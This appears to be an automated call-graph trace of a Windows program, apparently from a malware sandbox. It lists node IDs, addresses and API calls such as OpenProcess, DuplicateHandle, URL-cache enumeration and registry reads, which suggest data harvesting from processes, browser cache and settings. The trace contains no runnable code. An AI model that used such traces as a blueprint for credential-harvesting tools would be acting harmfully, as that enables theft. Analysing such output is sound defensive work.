38588 444b99 memcmp 38593 444b8c 38588->38593 38589 444c0b 39214 444a85 42 API calls 38589->39214 38593->38588 38593->38589 39211 444aa5 42 API calls 38593->39211 39212 40a7a0 GetVersionExW 38593->39212 39213 444a85 42 API calls 38593->39213 38596 40399d 38595->38596 39215 403a16 38596->39215 38598 403a09 39229 40b1ab free free 38598->39229 38600 4039a3 38600->38598 38604 4039f4 38600->38604 39226 40a02c CreateFileW 38600->39226 38601 403a12 wcsrchr 38601->38322 38604->38598 38605 4099c6 2 API calls 38604->38605 38605->38598 38607 414c2e 14 API calls 38606->38607 38608 404048 38607->38608 38609 414c2e 14 API calls 38608->38609 38610 404056 38609->38610 38611 409d1f 6 API calls 38610->38611 38612 404073 38611->38612 38613 409d1f 6 API calls 38612->38613 38614 40408e 38613->38614 38615 409d1f 6 API calls 38614->38615 38616 4040a6 38615->38616 38617 403af5 20 API calls 38616->38617 38618 4040ba 38617->38618 38619 403af5 20 API calls 38618->38619 38620 4040cb 38619->38620 39256 40414f memset 38620->39256 38622 4040e0 38623 404140 38622->38623 38625 4040ec memset 38622->38625 38627 4099c6 2 API calls 38622->38627 38628 40a8ab 9 API calls 38622->38628 39270 40b1ab free free 38623->39270 38625->38622 38626 404148 38626->38382 38627->38622 38628->38622 39283 40a6e6 WideCharToMultiByte 38629->39283 38631 4087ed 39284 4095d9 memset 38631->39284 38634 408809 memset memset memset memset memset 38635 40b2cc 27 API calls 38634->38635 38636 4088a1 38635->38636 38637 409d1f 6 API calls 38636->38637 38638 4088b1 38637->38638 38639 40b2cc 27 API calls 38638->38639 38640 4088c0 38639->38640 38641 409d1f 6 API calls 38640->38641 38642 4088d0 38641->38642 38643 40b2cc 27 API calls 38642->38643 38644 4088df 38643->38644 38645 409d1f 6 API calls 38644->38645 38646 4088ef 38645->38646 38647 40b2cc 27 API calls 38646->38647 38648 4088fe 38647->38648 38649 409d1f 6 API calls 38648->38649 38650 40890e 38649->38650 38651 40b2cc 27 API calls 38650->38651 38652 40891d 38651->38652 38653 409d1f 6 API calls 38652->38653 38654 40892d 38653->38654 39303 409b98 GetFileAttributesW 38654->39303 38656 40893e 38657 408943 38656->38657 38658 408958 38656->38658 39304 407fdf 75 API calls 38657->39304 39305 409b98 GetFileAttributesW 38658->39305 38661 408964 38662 408969 38661->38662 38663 40897b 38661->38663 39306 4082c7 198 API calls 38662->39306 39307 409b98 GetFileAttributesW 38663->39307 38666 408987 38667 4089a1 38666->38667 38668 40898c 38666->38668 39309 409b98 GetFileAttributesW 38667->39309 39308 408560 29 API calls 38668->39308 38678 408953 38678->38382 38681 40b633 free 38680->38681 38682 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38681->38682 38683 413f00 Process32NextW 38682->38683 38684 413da5 OpenProcess 38683->38684 38685 413f17 CloseHandle 38683->38685 38686 413df3 memset 38684->38686 38690 413eb0 38684->38690 38685->38425 39573 413f27 38686->39573 38688 413ec8 38688->38690 39600 4099f4 malloc memcpy free 38688->39600 38689 413ebf free 38689->38690 38690->38683 38690->38688 38690->38689 38692 413e37 GetModuleHandleW 38694 413e46 GetProcAddress 38692->38694 38695 413e1f 38692->38695 38694->38695 38695->38692 39578 413959 38695->39578 39594 413ca4 38695->39594 38697 413ea2 CloseHandle 38697->38690 38699 414c2e 14 API calls 38698->38699 38700 403eb7 38699->38700 38701 414c2e 14 API calls 38700->38701 38702 403ec5 38701->38702 38703 409d1f 6 API calls 38702->38703 38704 403ee2 38703->38704 38705 409d1f 6 API calls 38704->38705 38706 403efd 38705->38706 38707 409d1f 6 API calls 38706->38707 38708 403f15 38707->38708 38709 403af5 20 API calls 38708->38709 38710 403f29 38709->38710 38711 403af5 20 API calls 38710->38711 38712 403f3a 38711->38712 38713 40414f 33 API calls 38712->38713 38714 403f4f 38713->38714 38715 403faf 38714->38715 38717 403f5b memset 38714->38717 38719 4099c6 2 API calls 38714->38719 38720 40a8ab 9 API calls 38714->38720 39609 40b1ab free free 38715->39609 38717->38714 38718 403fb7 38718->38364 38719->38714 38720->38714 38722 414c2e 14 API calls 38721->38722 38723 403d26 38722->38723 38724 414c2e 14 API calls 38723->38724 38725 403d34 38724->38725 38726 409d1f 6 API calls 38725->38726 38727 403d51 38726->38727 38728 409d1f 6 API calls 38727->38728 38729 403d6c 38728->38729 38730 409d1f 6 API calls 38729->38730 38731 403d84 38730->38731 38732 403af5 20 API calls 38731->38732 38733 403d98 38732->38733 38734 403af5 20 API calls 38733->38734 38735 403da9 38734->38735 38736 40414f 33 API calls 38735->38736 38742 403dbe 38736->38742 38737 403e1e 39610 40b1ab free free 38737->39610 38738 403dca memset 38738->38742 38740 403e26 38740->38379 38741 4099c6 2 API calls 38741->38742 38742->38737 38742->38738 38742->38741 38743 40a8ab 9 API calls 38742->38743 38743->38742 38745 414b81 9 API calls 38744->38745 38746 414c40 38745->38746 38747 414c73 memset 38746->38747 39611 409cea 38746->39611 38751 414c94 38747->38751 38750 414c64 38750->38358 38752 414cf4 wcscpy 38751->38752 39614 414bb0 wcscpy 38751->39614 38752->38750 38754 414cd2 39615 4145ac RegQueryValueExW 38754->39615 38756 414ce9 38756->38752 38758 409d43 wcscpy 38757->38758 38760 409d62 38757->38760 38759 409719 2 API calls 38758->38759 38761 409d51 wcscat 38759->38761 38760->38402 38761->38760 38763 40aebe FindClose 38762->38763 38764 40ae21 38763->38764 38765 4099c6 2 API calls 38764->38765 38766 40ae35 38765->38766 38767 409d1f 6 API calls 38766->38767 38768 40ae49 38767->38768 38768->38442 38770 40ade0 38769->38770 38771 40ae0f 38769->38771 38770->38771 38772 40ade7 wcscmp 38770->38772 38771->38442 38772->38771 38773 40adfe wcscmp 38772->38773 38773->38771 38775 40ae18 9 API calls 38774->38775 38777 4453c4 38775->38777 38776 40ae51 9 API calls 38776->38777 38777->38776 38778 4453f3 38777->38778 38779 40add4 2 API calls 38777->38779 38782 445403 250 API calls 38777->38782 38780 40aebe FindClose 38778->38780 38779->38777 38781 4453fe 38780->38781 38781->38442 38782->38777 38784 40ae7b FindNextFileW 38783->38784 38785 40ae5c FindFirstFileW 38783->38785 38786 40ae94 38784->38786 38787 40ae8f 38784->38787 38785->38786 38789 40aeb6 38786->38789 38790 409d1f 6 API calls 38786->38790 38788 40aebe FindClose 38787->38788 38788->38786 38789->38442 38790->38789 38791->38354 38792->38334 38793->38428 38794->38411 38795->38411 38796->38443 38798 409c89 38797->38798 38798->38468 38799->38496 38801 413d39 38800->38801 38802 413d2f FreeLibrary 38800->38802 38803 40b633 free 38801->38803 38802->38801 38804 413d42 38803->38804 38805 40b633 free 38804->38805 38806 413d4a 38805->38806 38806->38324 38807->38327 38808->38371 38809->38394 38811 44db70 38810->38811 38812 40b6fc memset 38811->38812 38813 409c70 2 API calls 38812->38813 38814 40b732 wcsrchr 38813->38814 38815 40b743 38814->38815 38816 40b746 memset 38814->38816 38815->38816 38817 40b2cc 27 API calls 38816->38817 38818 40b76f 38817->38818 38819 409d1f 6 API calls 38818->38819 38820 40b783 38819->38820 39616 409b98 GetFileAttributesW 38820->39616 38822 40b792 38823 40b7c2 38822->38823 38825 409c70 2 API calls 38822->38825 39617 40bb98 38823->39617 38827 40b7a5 38825->38827 38830 40b2cc 27 API calls 38827->38830 38828 40b837 CloseHandle 38833 40b83e memset 38828->38833 38829 40b817 39651 409a45 GetTempPathW 38829->39651 38831 40b7b2 38830->38831 38834 409d1f 6 API calls 38831->38834 39650 40a6e6 WideCharToMultiByte 38833->39650 38834->38823 38835 40b827 38835->38833 38837 40b866 38838 444432 120 API calls 38837->38838 38839 40b879 38838->38839 38840 40b273 27 API calls 38839->38840 38841 40bad5 38839->38841 38842 40b89a 38840->38842 38843 40b04b ??3@YAXPAX 38841->38843 38844 438552 133 API calls 38842->38844 38845 40baf3 38843->38845 38846 40b8a4 38844->38846 38845->38405 38847 40bacd 38846->38847 38849 4251c4 136 API calls 38846->38849 38848 443d90 110 API calls 38847->38848 38848->38841 38872 40b8b8 38849->38872 38850 40bac6 39663 424f26 122 API calls 38850->39663 38851 40b8bd memset 39654 425413 17 API calls 38851->39654 38854 425413 17 API calls 38854->38872 38857 40a71b MultiByteToWideChar 38857->38872 38858 40a734 MultiByteToWideChar 38858->38872 38861 40b9b5 memcmp 38861->38872 38862 4099c6 2 API calls 38862->38872 38863 404423 37 API calls 38863->38872 38866 4251c4 136 API calls 38866->38872 38867 40bb3e memset memcpy 39664 40a734 MultiByteToWideChar 38867->39664 38869 40bb88 LocalFree 38869->38872 38872->38850 38872->38851 38872->38854 38872->38857 38872->38858 38872->38861 38872->38862 38872->38863 38872->38866 38872->38867 38873 40ba5f memcmp 38872->38873 39655 4253ef 16 API calls 38872->39655 39656 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38872->39656 39657 4253af 17 API calls 38872->39657 39658 4253cf 17 API calls 38872->39658 39659 447280 memset 38872->39659 39660 447960 memset memcpy memcpy memcpy 38872->39660 39661 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38872->39661 39662 447920 memcpy memcpy memcpy 38872->39662 38873->38872 38874->38407 38876 40aed1 38875->38876 38877 40aec7 FindClose 38875->38877 38876->38458 38877->38876 38879 4099d7 38878->38879 38880 4099da memcpy 38878->38880 38879->38880 38880->38381 38882 40b2cc 27 API calls 38881->38882 38883 44543f 38882->38883 38884 409d1f 6 API calls 38883->38884 38885 44544f 38884->38885 39753 409b98 GetFileAttributesW 38885->39753 38887 44545e 38888 445476 38887->38888 38890 40b6ef 249 API calls 38887->38890 38889 40b2cc 27 API calls 38888->38889 38891 445482 38889->38891 38890->38888 38892 409d1f 6 API calls 38891->38892 38893 445492 38892->38893 39754 409b98 GetFileAttributesW 38893->39754 38895 4454a1 38896 4454b9 38895->38896 38897 40b6ef 249 API calls 38895->38897 38896->38409 38897->38896 38898->38408 38899->38433 38900->38439 38901->38474 38902->38455 38903->38504 38904->38504 38905->38485 38906->38515 38907->38517 38908->38519 38910 414c2e 14 API calls 38909->38910 38911 40c2ae 38910->38911 38965 40c1d3 38911->38965 38916 40c3be 38933 40a8ab 38916->38933 38917 40afcf 2 API calls 38918 40c2fd FindFirstUrlCacheEntryW 38917->38918 38919 40c3b6 38918->38919 38920 40c31e wcschr 38918->38920 38921 40b04b ??3@YAXPAX 38919->38921 38922 40c331 38920->38922 38923 40c35e FindNextUrlCacheEntryW 38920->38923 38921->38916 38925 40a8ab 9 API calls 38922->38925 38923->38920 38924 40c373 GetLastError 38923->38924 38926 40c3ad FindCloseUrlCache 38924->38926 38927 40c37e 38924->38927 38928 40c33e wcschr 38925->38928 38926->38919 38929 40afcf 2 API calls 38927->38929 38928->38923 38930 40c34f 38928->38930 38931 40c391 FindNextUrlCacheEntryW 38929->38931 38932 40a8ab 9 API calls 38930->38932 38931->38920 38931->38926 38932->38923 39081 40a97a 38933->39081 38936 40a8cc 38936->38526 39087 40b1ab free free 38938->39087 38940 40c3dd 38941 40b2cc 27 API calls 38940->38941 38942 40c3e7 38941->38942 38943 40c50e 38942->38943 38944 40c3ff 38942->38944 38958 405337 38943->38958 38945 40a9ce 4 API calls 38944->38945 38946 40c418 memset 38945->38946 39088 40aa1d 38946->39088 38949 40c471 38951 40c47a _wcsupr 38949->38951 38950 40c505 38950->38943 39090 40a8d0 7 API calls 38951->39090 38953 40c498 39091 40a8d0 7 API calls 38953->39091 38955 40c4ac memset 38956 40aa1d 38955->38956 38957 40c4e4 RegEnumValueW 38956->38957 38957->38950 38957->38951 39092 405220 38958->39092 38961->38538 38962->38540 38963->38533 38964->38534 38966 40ae18 9 API calls 38965->38966 38972 40c210 38966->38972 38967 40ae51 9 API calls 38967->38972 38968 40c264 38969 40aebe FindClose 38968->38969 38971 40c26f 38969->38971 38970 40add4 2 API calls 38970->38972 38977 40e5ed memset memset 38971->38977 38972->38967 38972->38968 38972->38970 38973 40c231 _wcsicmp 38972->38973 38974 40c1d3 34 API calls 38972->38974 38973->38972 38975 40c248 38973->38975 38974->38972 38990 40c084 21 API calls 38975->38990 38978 414c2e 14 API calls 38977->38978 38979 40e63f 38978->38979 38980 409d1f 6 API calls 38979->38980 38981 40e658 38980->38981 38991 409b98 GetFileAttributesW 38981->38991 38983 40e667 38984 409d1f 6 API calls 38983->38984 38986 40e680 38983->38986 38984->38986 38992 409b98 GetFileAttributesW 38986->38992 38987 40e68f 38988 40c2d8 38987->38988 38993 40e4b2 38987->38993 38988->38916 38988->38917 38990->38972 38991->38983 38992->38987 39014 40e01e 38993->39014 38995 40e593 38996 40e5b0 38995->38996 38997 40e59c DeleteFileW 38995->38997 38998 40b04b ??3@YAXPAX 38996->38998 38997->38996 39000 40e5bb 38998->39000 38999 40e521 38999->38995 39037 40e175 38999->39037 39002 40e5c4 CloseHandle 39000->39002 39003 40e5cc 39000->39003 39002->39003 39005 40b633 free 39003->39005 39004 40e573 39007 40e584 39004->39007 39008 40e57c CloseHandle 39004->39008 39006 40e5db 39005->39006 39010 40b633 free 39006->39010 39080 40b1ab free free 39007->39080 39008->39007 39009 40e540 39009->39004 39057 40e2ab 39009->39057 39012 40e5e3 39010->39012 39012->38988 39015 406214 22 API calls 39014->39015 39016 40e03c 39015->39016 39017 40e16b 39016->39017 39018 40dd85 74 API calls 39016->39018 39017->38999 39019 40e06b 39018->39019 39019->39017 39020 40afcf ??2@YAPAXI ??3@YAXPAX 39019->39020 39021 40e08d OpenProcess 39020->39021 39022 40e0a4 GetCurrentProcess DuplicateHandle 39021->39022 39026 40e152 39021->39026 39023 40e0d0 GetFileSize 39022->39023 39024 40e14a CloseHandle 39022->39024 39027 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39023->39027 39024->39026 39025 40e160 39029 40b04b ??3@YAXPAX 39025->39029 39026->39025 39028 406214 22 API calls 39026->39028 39030 40e0ea 39027->39030 39028->39025 39029->39017 39031 4096dc CreateFileW 39030->39031 39032 40e0f1 CreateFileMappingW 39031->39032 39033 40e140 CloseHandle CloseHandle 39032->39033 39034 40e10b MapViewOfFile 39032->39034 39033->39024 39035 40e13b CloseHandle 39034->39035 39036 40e11f WriteFile UnmapViewOfFile 39034->39036 39035->39033 39036->39035 39038 40e18c 39037->39038 39039 406b90 11 API calls 39038->39039 39040 40e19f 39039->39040 39041 40e1a7 memset 39040->39041 39042 40e299 39040->39042 39047 40e1e8 39041->39047 39043 4069a3 ??3@YAXPAX free 39042->39043 39044 40e2a4 39043->39044 39044->39009 39045 406e8f 13 API calls 39045->39047 39046 406b53 SetFilePointerEx ReadFile 39046->39047 39047->39045 39047->39046 39048 40dd50 _wcsicmp 39047->39048 39049 40e283 39047->39049 39053 40742e 8 API calls 39047->39053 39054 40aae3 wcslen wcslen _memicmp 39047->39054 39055 40e244 _snwprintf 39047->39055 39048->39047 39050 40e291 39049->39050 39051 40e288 free 39049->39051 39052 40aa04 free 39050->39052 39051->39050 39052->39042 39053->39047 39054->39047 39056 40a8d0 7 API calls 39055->39056 39056->39047 39058 40e2c2 39057->39058 39059 406b90 11 API calls 39058->39059 39070 40e2d3 39059->39070 39060 40e4a0 39061 4069a3 ??3@YAXPAX free 39060->39061 39063 40e4ab 39061->39063 39062 406e8f 13 API calls 39062->39070 39063->39009 39064 406b53 SetFilePointerEx ReadFile 39064->39070 39065 40e489 39066 40aa04 free 39065->39066 39067 40e491 39066->39067 39067->39060 39069 40e497 free 39067->39069 39068 40dd50 _wcsicmp 39068->39070 39069->39060 39070->39060 39070->39062 39070->39064 39070->39065 39070->39068 39071 40dd50 _wcsicmp 39070->39071 39074 40742e 8 API calls 39070->39074 39075 40e3e0 memcpy 39070->39075 39076 40e3fb memcpy 39070->39076 39077 40e3b3 wcschr 39070->39077 39078 40e416 memcpy 39070->39078 39079 40e431 memcpy 39070->39079 39072 40e376 memset 39071->39072 39073 40aa29 6 API calls 39072->39073 39073->39070 39074->39070 39075->39070 39076->39070 39077->39070 39078->39070 39079->39070 39080->38995 39082 40a980 39081->39082 39083 40a995 _wcsicmp 39082->39083 39084 40a99c wcscmp 39082->39084 39085 40a8bb 39082->39085 39083->39082 39084->39082 39085->38936 39086 40a8d0 7 API calls 39085->39086 39086->38936 39087->38940 39089 40aa23 RegEnumValueW 39088->39089 39089->38949 39089->38950 39090->38953 39091->38955 39093 405335 39092->39093 39094 40522a 39092->39094 39093->38533 39095 40b2cc 27 API calls 39094->39095 39096 405234 39095->39096 39097 40a804 8 API calls 39096->39097 39098 40523a 39097->39098 39137 40b273 39098->39137 39100 405248 _mbscpy _mbscat GetProcAddress 39101 40b273 27 API calls 39100->39101 39102 405279 39101->39102 39140 405211 GetProcAddress 39102->39140 39104 405282 39105 40b273 27 API calls 39104->39105 39106 40528f 39105->39106 39141 405211 GetProcAddress 39106->39141 39108 405298 39109 40b273 27 API calls 39108->39109 39110 4052a5 39109->39110 39142 405211 GetProcAddress 39110->39142 39112 4052ae 39113 40b273 27 API calls 39112->39113 39114 4052bb 39113->39114 39143 405211 GetProcAddress 39114->39143 39116 4052c4 39117 40b273 27 API calls 39116->39117 39118 4052d1 39117->39118 39144 405211 GetProcAddress 39118->39144 39120 4052da 39121 40b273 27 API calls 39120->39121 39122 4052e7 39121->39122 39145 405211 GetProcAddress 39122->39145 39124 4052f0 39125 40b273 27 API calls 39124->39125 39126 4052fd 39125->39126 39146 405211 GetProcAddress 39126->39146 39128 405306 39129 40b273 27 API calls 39128->39129 39130 405313 39129->39130 39147 405211 GetProcAddress 39130->39147 39132 40531c 39133 40b273 27 API calls 39132->39133 39134 405329 39133->39134 39148 405211 GetProcAddress 39134->39148 39136 405332 39136->39093 39138 40b58d 27 API calls 39137->39138 39139 40b18c 39138->39139 39139->39100 39140->39104 39141->39108 39142->39112 39143->39116 39144->39120 39145->39124 39146->39128 39147->39132 39148->39136 39150 40440c FreeLibrary 39149->39150 39151 40436d 39150->39151 39152 40a804 8 API calls 39151->39152 39153 404377 39152->39153 39154 404383 39153->39154 39155 404405 39153->39155 39156 40b273 27 API calls 39154->39156 39155->38545 39155->38547 39155->38548 39157 40438d GetProcAddress 39156->39157 39158 40b273 27 API calls 39157->39158 39159 4043a7 GetProcAddress 39158->39159 39160 40b273 27 API calls 39159->39160 39161 4043ba GetProcAddress 39160->39161 39162 40b273 27 API calls 39161->39162 39163 4043ce GetProcAddress 39162->39163 39164 40b273 27 API calls 39163->39164 39165 4043e2 GetProcAddress 39164->39165 39166 4043f1 39165->39166 39167 4043f7 39166->39167 39168 40440c FreeLibrary 39166->39168 39167->39155 39168->39155 39170 404413 FreeLibrary 39169->39170 39171 40441e 39169->39171 39170->39171 39171->38562 39172->38558 39174 40447e 39173->39174 39175 40442e 39173->39175 39174->38558 39176 40b2cc 27 API calls 39175->39176 39177 404438 39176->39177 39178 40a804 8 API calls 39177->39178 39179 40443e 39178->39179 39180 404445 39179->39180 39181 404467 39179->39181 39182 40b273 27 API calls 39180->39182 39181->39174 39184 404475 FreeLibrary 39181->39184 39183 40444f GetProcAddress 39182->39183 39183->39181 39185 404460 39183->39185 39184->39174 39185->39181 39187 4135f6 39186->39187 39188 4135eb FreeLibrary 39186->39188 39187->38565 39188->39187 39190 4449c4 39189->39190 39191 444a52 39189->39191 39192 40b2cc 27 API calls 39190->39192 39191->38582 39191->38583 39193 4449cb 39192->39193 39194 40a804 8 API calls 39193->39194 39195 4449d1 39194->39195 39196 40b273 27 API calls 39195->39196 39197 4449dc GetProcAddress 39196->39197 39198 40b273 27 API calls 39197->39198 39199 4449f3 GetProcAddress 39198->39199 39200 40b273 27 API calls 39199->39200 39201 444a04 GetProcAddress 39200->39201 39202 40b273 27 API calls 39201->39202 39203 444a15 GetProcAddress 39202->39203 39204 40b273 27 API calls 39203->39204 39205 444a26 GetProcAddress 39204->39205 39206 40b273 27 API calls 39205->39206 39207 444a37 GetProcAddress 39206->39207 39208 40b273 27 API calls 39207->39208 39209 444a48 GetProcAddress 39208->39209 39209->39191 39210->38593 39211->38593 39212->38593 39213->38593 39214->38584 39216 403a29 39215->39216 39230 403bed memset memset 39216->39230 39218 403ae7 39243 40b1ab free free 39218->39243 39219 403a3f memset 39223 403a2f 39219->39223 39221 403aef 39221->38600 39222 409d1f 6 API calls 39222->39223 39223->39218 39223->39219 39223->39222 39224 409b98 GetFileAttributesW 39223->39224 39225 40a8d0 7 API calls 39223->39225 39224->39223 39225->39223 39227 40a051 GetFileTime CloseHandle 39226->39227 39228 4039ca CompareFileTime 39226->39228 39227->39228 39228->38600 39229->38601 39231 414c2e 14 API calls 39230->39231 39232 403c38 39231->39232 39233 409719 2 API calls 39232->39233 39234 403c3f wcscat 39233->39234 39235 414c2e 14 API calls 39234->39235 39236 403c61 39235->39236 39237 409719 2 API calls 39236->39237 39238 403c68 wcscat 39237->39238 39244 403af5 39238->39244 39241 403af5 20 API calls 39242 403c95 39241->39242 39242->39223 39243->39221 39245 403b02 39244->39245 39246 40ae18 9 API calls 39245->39246 39255 403b37 39246->39255 39247 403bdb 39249 40aebe FindClose 39247->39249 39248 40add4 wcscmp wcscmp 39248->39255 39250 403be6 39249->39250 39250->39241 39251 40a8d0 7 API calls 39251->39255 39252 40ae18 9 API calls 39252->39255 39253 40ae51 9 API calls 39253->39255 39254 40aebe FindClose 39254->39255 39255->39247 39255->39248 39255->39251 39255->39252 39255->39253 39255->39254 39257 409d1f 6 API calls 39256->39257 39258 404190 39257->39258 39271 409b98 GetFileAttributesW 39258->39271 39260 40419c 39261 4041a7 6 API calls 39260->39261 39262 40435c 39260->39262 39263 40424f 39261->39263 39262->38622 39263->39262 39265 40425e memset 39263->39265 39267 409d1f 6 API calls 39263->39267 39268 40a8ab 9 API calls 39263->39268 39272 414842 39263->39272 39265->39263 39266 404296 wcscpy 39265->39266 39266->39263 39267->39263 39269 4042b6 memset memset _snwprintf wcscpy 39268->39269 39269->39263 39270->38626 39271->39260 39275 41443e 39272->39275 39274 414866 39274->39263 39276 41444b 39275->39276 39277 414451 39276->39277 39278 4144a3 GetPrivateProfileStringW 39276->39278 39279 414491 39277->39279 39280 414455 wcschr 39277->39280 39278->39274 39282 414495 WritePrivateProfileStringW 39279->39282 39280->39279 39281 414463 _snwprintf 39280->39281 39281->39282 39282->39274 39283->38631 39285 40b2cc 27 API calls 39284->39285 39286 409615 39285->39286 39287 409d1f 6 API calls 39286->39287 39288 409625 39287->39288 39313 409b98 GetFileAttributesW 39288->39313 39290 409634 39291 409648 39290->39291 39314 4091b8 memset 39290->39314 39293 40b2cc 27 API calls 39291->39293 39295 408801 39291->39295 39294 40965d 39293->39294 39296 409d1f 6 API calls 39294->39296 39295->38634 39295->38678 39297 40966d 39296->39297 39366 409b98 GetFileAttributesW 39297->39366 39299 40967c 39299->39295 39300 409681 39299->39300 39367 409529 72 API calls 39300->39367 39302 409690 39302->39295 39303->38656 39304->38678 39305->38661 39306->38678 39307->38666 39308->38667 39313->39290 39368 40a6e6 WideCharToMultiByte 39314->39368 39316 409202 39369 444432 39316->39369 39319 40b273 27 API calls 39320 409236 39319->39320 39415 438552 39320->39415 39323 409383 39325 40b273 27 API calls 39323->39325 39327 409399 39325->39327 39326 409254 39328 40937b 39326->39328 39436 4253cf 17 API calls 39326->39436 39329 438552 133 API calls 39327->39329 39440 424f26 122 API calls 39328->39440 39348 4093a3 39329->39348 39332 409267 39437 4253cf 17 API calls 39332->39437 39333 4094ff 39444 443d90 39333->39444 39336 4251c4 136 API calls 39336->39348 39337 409273 39438 4253af 17 API calls 39337->39438 39338 409507 39346 40951d 39338->39346 39464 408f2f 77 API calls 39338->39464 39340 4093df 39443 424f26 122 API calls 39340->39443 39342 4253cf 17 API calls 39342->39348 39346->39291 39348->39333 39348->39336 39348->39340 39348->39342 39350 4093e4 39348->39350 39441 4253af 17 API calls 39350->39441 39356 4093ed 39442 4253af 17 API calls 39356->39442 39359 4093f9 39359->39340 39360 409409 memcmp 39359->39360 39360->39340 39361 409421 memcmp 39360->39361 39362 4094a4 memcmp 39361->39362 39363 409435 39361->39363 39362->39340 39365 4094b8 memcpy memcpy 39362->39365 39363->39340 39364 409442 memcpy memcpy memcpy 39363->39364 39364->39340 39365->39340 39366->39299 39367->39302 39368->39316 39465 4438b5 39369->39465 39371 44444c 39377 409215 39371->39377 39479 415a6d 39371->39479 39374 444486 39376 4444b9 memcpy 39374->39376 39414 4444a4 39374->39414 39375 44469e 39375->39377 39379 443d90 110 API calls 39375->39379 39483 415258 39376->39483 39377->39319 39377->39346 39379->39377 39380 444524 39381 444541 39380->39381 39382 44452a 39380->39382 39486 444316 39381->39486 39520 416935 39382->39520 39386 444316 18 API calls 39387 444563 39386->39387 39388 444316 18 API calls 39387->39388 39389 44456f 39388->39389 39390 444316 18 API calls 39389->39390 39391 44457f 39390->39391 39391->39414 39500 432d4e 39391->39500 39394 444316 18 API calls 39395 4445b0 39394->39395 39504 41eed2 39395->39504 39533 4442e6 11 API calls 39414->39533 39534 438460 39415->39534 39417 409240 39417->39323 39418 4251c4 39417->39418 39546 424f07 39418->39546 39420 4251e4 39421 4251f7 39420->39421 39422 4251e8 39420->39422 39554 4250f8 39421->39554 39553 4446ea 11 API calls 39422->39553 39424 4251f2 39424->39326 39426 425209 39429 425249 39426->39429 39432 4250f8 126 API calls 39426->39432 39433 425287 39426->39433 39562 4384e9 134 API calls 39426->39562 39563 424f74 123 API calls 39426->39563 39429->39433 39564 424ff0 13 API calls 39429->39564 39432->39426 39566 415c7d 16 API calls 39433->39566 39434 425266 39434->39433 39565 415be9 memcpy 39434->39565 39436->39332 39437->39337 39440->39323 39441->39356 39442->39359 39443->39333 39445 443da3 39444->39445 39463 443db6 39444->39463 39567 41707a 11 API calls 39445->39567 39447 443da8 39448 443dac 39447->39448 39450 443dbc 39447->39450 39568 4446ea 11 API calls 39448->39568 39569 4300e8 memset memset memcpy 39450->39569 39452 443de0 39453 416935 16 API calls 39452->39453 39453->39463 39454 443dce 39454->39452 39458 443e22 39454->39458 39455 443e5a 39458->39455 39570 41f0ac 102 API calls 39458->39570 39463->39338 39464->39346 39466 4438d0 39465->39466 39472 4438c9 39465->39472 39467 415378 memcpy memcpy 39466->39467 39468 4438d5 39467->39468 39469 4154e2 10 API calls 39468->39469 39470 443906 39468->39470 39468->39472 39469->39470 39471 443970 memset 39470->39471 39470->39472 39474 44398b 39471->39474 39472->39371 39473 415700 10 API calls 39476 4439c0 39473->39476 39475 41975c 10 API calls 39474->39475 39477 4439a0 39474->39477 39475->39477 39476->39472 39478 418981 10 API calls 39476->39478 39477->39472 39477->39473 39478->39472 39480 415a77 39479->39480 39481 415a8d 39480->39481 39482 415a7e memset 39480->39482 39481->39374 39482->39481 39484 4438b5 11 API calls 39483->39484 39485 41525d 39484->39485 39485->39380 39487 444328 39486->39487 39488 444423 39487->39488 39489 44434e 39487->39489 39490 4446ea 11 API calls 39488->39490 39491 432d4e memset memset memcpy 39489->39491 39497 444381 39490->39497 39492 44435a 39491->39492 39494 444375 39492->39494 39499 44438b 39492->39499 39493 432d4e memset memset memcpy 39495 4443ec 39493->39495 39496 416935 16 API calls 39494->39496 39495->39497 39498 416935 16 API calls 39495->39498 39496->39497 39497->39386 39498->39497 39499->39493 39501 432d58 39500->39501 39503 432d65 39500->39503 39502 432cc4 memset memset memcpy 39501->39502 39502->39503 39503->39394 39505 41eee2 39504->39505 39521 41693e 39520->39521 39524 41698e 39520->39524 39522 41694c 39521->39522 39523 422fd1 memset 39521->39523 39522->39524 39525 4165a0 11 API calls 39522->39525 39523->39522 39524->39414 39526 416972 39525->39526 39526->39524 39527 422b84 15 API calls 39526->39527 39527->39524 39533->39375 39535 41703f 11 API calls 39534->39535 39536 43847a 39535->39536 39537 43848a 39536->39537 39538 43847e 39536->39538 39540 438270 133 API calls 39537->39540 39539 4446ea 11 API calls 39538->39539 39542 438488 39539->39542 39541 4384aa 39540->39541 39541->39542 39543 424f26 122 API calls 39541->39543 39542->39417 39544 4384bb 39543->39544 39545 438270 133 API calls 39544->39545 39545->39542 39547 424f1f 39546->39547 39548 424f0c 39546->39548 39550 424eea 11 API calls 39547->39550 39549 416760 11 API calls 39548->39549 39551 424f18 39549->39551 39552 424f24 39550->39552 39551->39420 39552->39420 39553->39424 39555 425108 39554->39555 39561 42510d 39554->39561 39556 424f74 123 API calls 39555->39556 39556->39561 39557 42569b 124 API calls 39558 42516e 39557->39558 39560 415c7d 16 API calls 39558->39560 39559 425115 39559->39426 39560->39559 39561->39557 39561->39559 39562->39426 39563->39426 39564->39434 39565->39433 39566->39424 39567->39447 39568->39463 39569->39454 39570->39458 39601 413f4f 39573->39601 39576 413f37 K32GetModuleFileNameExW 39577 413f4a 39576->39577 39577->38695 39579 41396c wcschr 39578->39579 39581 413969 wcscpy 39578->39581 39579->39581 39582 41398e 39579->39582 39583 413a3a 39581->39583 39606 4097f7 wcslen wcslen _memicmp 39582->39606 39583->38695 39585 41399a 39586 4139a4 memset 39585->39586 39587 4139e6 39585->39587 39607 409dd5 GetWindowsDirectoryW wcscpy 39586->39607 39589 413a31 wcscpy 39587->39589 39590 4139ec memset 39587->39590 39589->39583 39608 409dd5 GetWindowsDirectoryW wcscpy 39590->39608 39591 4139c9 wcscpy wcscat 39591->39583 39593 413a11 memcpy wcscat 39593->39583 39595 413cb0 GetModuleHandleW 39594->39595 39596 413cda 39594->39596 39595->39596 39597 413cbf GetProcAddress 39595->39597 39598 413ce3 GetProcessTimes 39596->39598 39599 413cf6 39596->39599 39597->39596 39598->38697 39599->38697 39600->38688 39602 413f2f 39601->39602 39603 413f54 39601->39603 39602->39576 39602->39577 39604 40a804 8 API calls 39603->39604 39605 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39604->39605 39605->39602 39606->39585 39607->39591 39608->39593 39609->38718 39610->38740 39612 409cf9 